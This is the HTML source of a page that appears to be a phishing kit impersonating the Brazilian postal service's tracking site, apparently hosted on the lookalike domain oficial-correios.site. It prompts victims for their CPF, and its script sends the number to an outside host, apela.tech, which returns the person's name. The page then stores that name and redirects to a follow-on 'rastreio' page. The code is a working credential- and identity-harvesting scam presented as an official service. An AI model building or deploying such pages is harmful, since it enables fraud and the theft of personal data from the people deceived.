<html lang="pt-BR"><head>
    <title>🟢 CORREIO - ENTRAR - Cópia</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no, shrink-to-fit=no">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="images/hTRRBdbEzoXv.ico">
    <link rel="apple-touch-icon" href="images/hTRRBdbEzoXv.ico">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <meta name="robots" content="all">
    <meta property="og:locale" content="pt_BR">
    <meta property="og:type" content="article">
    <meta property="og:title" content="CORREIOS - OFICIAL">
    <meta property="og:description" content="Regularização de encomenda">
    <meta property="og:site_name" content="CORREIOS OFICIAL">
    <meta property="og:url" content="https://www.oficial-correios.site/entrando">
    <link rel="stylesheet" href="css/pBPf5KuIDiuq.css">
    <link rel="dns-prefetch preconnect" href="https://fonts.googleapis.com" crossorigin="">
    <link rel="dns-prefetch preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,400;0,700;1,400;1,700&family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&display=swap" rel="stylesheet" media="all">
</head>

<body class="">
    <div id="site">
        <div id="b_1248129_1_17370464156789398f2bf7e" class="gpc-b ">
            <div class="gpc-b_sobreposicao"></div>
            <div class="centralizar">
                <div id="e_1248129_1_17370464156789398f2bf9e102374210" class="gpc-e e_texto dd dm e_1248129_1_17370464156789398f2bf9e102374210" style="white-space: normal;">
                    <div class="c e_texto" style="white-space: normal;">
                        <p><span><b>Rastreamento</b></span></p>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f2c2c5633610212" class="gpc-e e_caixa dd dm e_1248129_1_17370464156789398f2c2c5633610212">
                    <div class="c borda_igual e_caixa"></div>
                </div>
                <div id="e_1248129_1_17370464156789398f2c326419756588" class="gpc-e e_texto dd dm e_1248129_1_17370464156789398f2c326419756588">
                    <div class="c e_texto" style="white-space: normal;">
                        <p><b>ACOMPANHE SUAS ENCOMENDAS ABAIXO</b></p>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f2c378980206316" class="gpc-e e_texto dd dm e_1248129_1_17370464156789398f2c378980206316" style="white-space: normal;">
                    <div class="c e_texto" style="white-space: normal;">
                        <p><span>Deseja acompanhar seu objeto?<br>Digite o CPF do comprador</span></p>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f2c3d5890029603" class="gpc-e e_formulario dd dm e_1248129_1_17370464156789398f2c3d5890029603" style="white-space: normal;">
                    <form class="c e_formulario" id="86a1c069-1635-8c99-4afd-36afc50ead32" style="white-space: normal;">
                        <fieldset>
                            <div class="gpc_campos gpc_campos-input gpc_campos-100">
                                <div class="gpc_campos-titulo esconder">
                                    <label for="input_1734416045"><span><em>*</em>cpf: 000.000.000-00</span><span class="gpc_campos-titulo_descricao icone-informacao gtt-baixo esconder" data-gtt=""></span></label></div>
                                <div class="gpc_campos-campo"><input id="input_1734416045" name="cpf-000000000-00" type="text" placeholder="* cpf: 000.000.000-00" class="gpc_campo  cpf obrigatorio" value="">
                                    <div class="gpc_campos-erro icone_bold-aviso gtt-esquerda" data-gtt=""></div>
                                </div>
                                <div class="gpc_campos-texto"></div>
                            </div>
                        </fieldset>
                        <button class="gpc_botao borda_igual e_formulario"><span>Consultar</span></button>
                    </form>
                </div>
                <div id="e_1248129_1_17370464156789398f32122587196927" class="gpc-e e_imagem dd dm e_1248129_1_17370464156789398f32122587196927" style="white-space: normal;">
                    <div class="c imagem e_imagem" style="white-space: normal;">
                        <div class="imagem_fundo"></div>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f32262597684658" class="gpc-e e_imagem dd dm e_1248129_1_17370464156789398f32262597684658" style="white-space: normal;">
                    <div class="c imagem e_imagem" style="white-space: normal;">
                        <div class="imagem_fundo"></div>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f3234a507668651" class="gpc-e e_titulo dd dm e_1248129_1_17370464156789398f3234a507668651" style="white-space: normal;">
                    <div class="c e_titulo" style="white-space: normal;">
                        <h2><span>Portal Correios </span><span>> </span><span>Rastreamento </span></h2>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f3240e670180056" class="gpc-e e_texto dd dm e_1248129_1_17370464156789398f3240e670180056" style="white-space: normal;">
                    <div class="c e_texto" style="white-space: normal;">
                        <p><span><b>Atenção:</b> Digite seu CPF sem pontos e traços (apenas números)</span></p>
                    </div>
                </div>
                <div id="e_1248129_1_17370464156789398f32469548758122" class="gpc-e e_texto dd dm e_1248129_1_17370464156789398f32469548758122 error" style="white-space: normal;">
                    <div class="c e_texto" style="white-space: normal;">
                        <p><b class="textoerror">CPF</b></p>
                    </div>
                </div>
            </div>
        </div>
        <div id="b_1248129_1_17370464156789398f2bf98" class="gpc-b">
            <div class="gpc-b_sobreposicao"></div>
        </div>
    </div>

    <style>
        .obrigatorio.active {
            border: 1px solid red !important;
        }

        .error {
            width: auto !important;
        }

        .error.active {
            width: auto !important;
        }

        .textoerror.active {
            color: red !important;
        }
    </style>

<script>
document.addEventListener("DOMContentLoaded", () => {
    const form = document.querySelector("form.e_formulario");
    const inputCPF = document.getElementById("input_1734416045");
    const btnConsultar = form.querySelector("button");
    const errorDiv = form.querySelector(".gpc_campos-erro");
    const textoErrorDiv = document.querySelector(".textoerror");

    inputCPF.addEventListener("input", (e) => {
        let value = e.target.value.replace(/\D/g, "");

        if (value.length > 3) value = value.replace(/(\d{3})(\d)/, "$1.$2");
        if (value.length > 7) value = value.replace(/(\d{3})\.(\d{3})(\d)/, "$1.$2.$3");
        if (value.length > 11) value = value.replace(/(\d{3})\.(\d{3})\.(\d{3})(\d{1,2})/, "$1.$2.$3-$4");

        e.target.value = value;
    });

    const isValidCPF = (cpf) => cpf.replace(/\D/g, "").length === 11;

    btnConsultar.addEventListener("click", async (e) => {
        e.preventDefault();
        const cpf = inputCPF.value.replace(/\D/g, "");

        errorDiv.classList.remove("active");
        textoErrorDiv.classList.remove("active");
        inputCPF.classList.remove("active");

        if (!isValidCPF(cpf)) {
            inputCPF.classList.add("obrigatorio", "active");
            errorDiv.classList.add("error", "active");
            textoErrorDiv.classList.add("textoerror", "active");
            textoErrorDiv.textContent = "CPF precisa ter 11 dígitos!";
            return;
        }

        try {
            const response = await fetch(`https://apela.tech?user=de719533-3a21-4f90-ac11-16e57b4942b9&cpf=${cpf}`);
            if (!response.ok) {
                throw new Error("Erro ao validar CPF!");
            }
            const data = await response.json();
            if (data.status === 200) {
                sessionStorage.setItem("cpf", data.cpf);
                sessionStorage.setItem("nome", data.nome);
                sessionStorage.setItem("data_atual", data.data_atual);
                var currentUrlParams = window.location.search;
                window.location.href = "../rastreio" + currentUrlParams;
            } else {
                throw new Error(data.message || "CPF incorreto! Digite novamente");
            }
        } catch (error) {
            inputCPF.classList.add("obrigatorio", "active");
            errorDiv.classList.add("error", "active");
            textoErrorDiv.classList.add("textoerror", "active");
            textoErrorDiv.textContent = error.message;
        }
    });
});

  </script>

    


</body></html>
